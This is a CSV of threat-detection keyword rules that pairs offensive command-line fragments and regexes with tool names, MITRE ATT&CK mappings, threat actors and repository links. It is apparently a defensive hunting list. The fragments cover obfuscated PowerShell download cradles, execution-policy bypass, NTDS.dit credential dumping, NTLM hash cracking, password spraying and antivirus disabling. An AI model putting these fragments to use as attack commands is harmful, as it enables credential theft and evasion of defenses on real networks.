"* -NoP -w HidDen -c $a=neW-ObJeCt nET.wEbClieNt*",".{0,1000}\s\-NoP\s\-w\sHidDen\s\-c\s\$a\=neW\-ObJeCt\snET\.wEbClieNt.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","2355"
"* -no-pass -dns-tcp -nameserver*",".{0,1000}\s\-no\-pass\s\-dns\-tcp\s\-nameserver.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","2357"
"* -no-pass -just-dc-user *",".{0,1000}\s\-no\-pass\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2358"
"* -no-pass rid-hijack*",".{0,1000}\s\-no\-pass\srid\-hijack.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","2359"
"* -no-pass -usersfile *",".{0,1000}\s\-no\-pass\s\-usersfile\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2360"
"* NoPowerShell.*",".{0,1000}\sNoPowerShell\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","2361"
"* No-PowerShell.cs*",".{0,1000}\sNo\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","2362"
"* --no-ppid-spoof*",".{0,1000}\s\-\-no\-ppid\-spoof.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2363"
"* -no-preauth * -dc-ip *",".{0,1000}\s\-no\-preauth\s.{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2364"
"* -NoPRo -wIN 1 -nONi -eN Sh33L*",".{0,1000}\s\-NoPRo\s\-wIN\s1\s\-nONi\s\-eN\sSh33L.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","2365"
"* -nopROfi -EXe byPAsS -wiNDOwsTy HIDdEN -cOMMA *",".{0,1000}\s\-nopROfi\s\-EXe\sbyPAsS\s\-wiNDOwsTy\sHIDdEN\s\-cOMMA\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","2366"
"* -NopROFi -wIN hidd -EXEcutiOnPoLiC BYpAsS  -COm    *",".{0,1000}\s\-NopROFi\s\-wIN\shidd\s\-EXEcutiOnPoLiC\sBYpAsS\s\s\-COm\s\s\s\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","2367"
"* -NoPRofi -WiNdoWSTYL hidd -EXecUTiOnPO BYpASS -cO *",".{0,1000}\s\-NoPRofi\s\-WiNdoWSTYL\shidd\s\-EXecUTiOnPO\sBYpASS\s\-cO\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","2368"
"* norouteconfig.sh*",".{0,1000}\snorouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","2369"
"* --no-sigthief*",".{0,1000}\s\-\-no\-sigthief.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2370"
"* -notcontains * -notlike ""ntuser.dat*"" -and $_.Extension -ne "".tm*",".{0,1000}\s\-notcontains\s.{0,1000}\s\-notlike\s\""ntuser\.dat.{0,1000}\""\s\-and\s\$_\.Extension\s\-ne\s\""\.tm.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2371"
"* --no-vm-kill*",".{0,1000}\s\-\-no\-vm\-kill.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","2372"
"* --no-vm-snapshot-kill*",".{0,1000}\s\-\-no\-vm\-snapshot\-kill.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","2373"
"* nping-brute.nse*",".{0,1000}\snping\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2374"
"* nrpe-enum.nse*",".{0,1000}\snrpe\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2375"
"* NSudo.exe*",".{0,1000}\sNSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","2376"
"* NSudo.exe*",".{0,1000}\sNSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2377"
"* NtCr3at3Thr3adEx @ *",".{0,1000}\sNtCr3at3Thr3adEx\s\@\s.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","2378"
"* ntdll_unhooking.exe*",".{0,1000}\sntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2379"
"* ntdll_unhooking.exe*",".{0,1000}\sntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2380"
"* --ntds * -crack *",".{0,1000}\s\-\-ntds\s.{0,1000}\s\-crack\s.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","2381"
"* -ntds *.dit *-system *",".{0,1000}\s\-ntds\s.{0,1000}\.dit\s.{0,1000}\-system\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2382"
"* -ntds NTDS.dit  -filters*",".{0,1000}\s\-ntds\sNTDS\.dit\s\s\-filters.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","2383"
"* -ntds ntds.dit -system SYSTEM *",".{0,1000}\s\-ntds\sntds\.dit\s\-system\sSYSTEM\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2384"
"* -ntds NTDS.dit -system SYSTEM -outputdir /*",".{0,1000}\s\-ntds\sNTDS\.dit\s\-system\sSYSTEM\s\-outputdir\s\/.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","2385"
"* -ntds ntds.dit.save -system system.save LOCAL*",".{0,1000}\s\-ntds\sntds\.dit\.save\s\-system\ssystem\.save\sLOCAL.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2386"
"* --ntds-file *",".{0,1000}\s\-\-ntds\-file\s.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","2387"
"* --ntds-history*",".{0,1000}\s\-\-ntds\-history.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2388"
"* --ntds-pwdLastSet*",".{0,1000}\s\-\-ntds\-pwdLastSet.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2389"
"* ntdsuseraccount.py*",".{0,1000}\sntdsuseraccount\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","2390"
"* -nthash * -domain-sid *",".{0,1000}\s\-nthash\s.{0,1000}\s\-domain\-sid\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2391"
"* -nthash * -spn * -domain-sid * -domain *",".{0,1000}\s\-nthash\s.{0,1000}\s\-spn\s.{0,1000}\s\-domain\-sid\s.{0,1000}\s\-domain\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2392"
"* -nthash *-domain-sid S-1-5-11-39129514-1145628974-103568174 -domain*",".{0,1000}\s\-nthash\s.{0,1000}\-domain\-sid\sS\-1\-5\-11\-39129514\-1145628974\-103568174\s\-domain.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2393"
"* ntlm.py*",".{0,1000}\sntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2394"
"* ntlm.wordlist *--hex-wordlist*",".{0,1000}\sntlm\.wordlist\s.{0,1000}\-\-hex\-wordlist.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential Access","https://github.com/hashcat/hashcat","1","0","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","2395"
"* ntlmdecoder.py*",".{0,1000}\sntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2396"
"* ntlmdecoder.py*",".{0,1000}\sntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","2397"
"* --ntlm-hash --company * --import-cracked *",".{0,1000}\s\-\-ntlm\-hash\s\-\-company\s.{0,1000}\s\-\-import\-cracked\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","2398"
"* --ntlm-hash --export-hashes *",".{0,1000}\s\-\-ntlm\-hash\s\-\-export\-hashes\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","2399"
"* --ntlm-hash --import-ntds *.ntds*",".{0,1000}\s\-\-ntlm\-hash\s\-\-import\-ntds\s.{0,1000}\.ntds.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","2400"
"* --ntlm-proxy-ip * --ntlm-proxy-port *",".{0,1000}\s\-\-ntlm\-proxy\-ip\s.{0,1000}\s\-\-ntlm\-proxy\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","2401"
"* ntlmrecon*",".{0,1000}\sntlmrecon.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","2402"
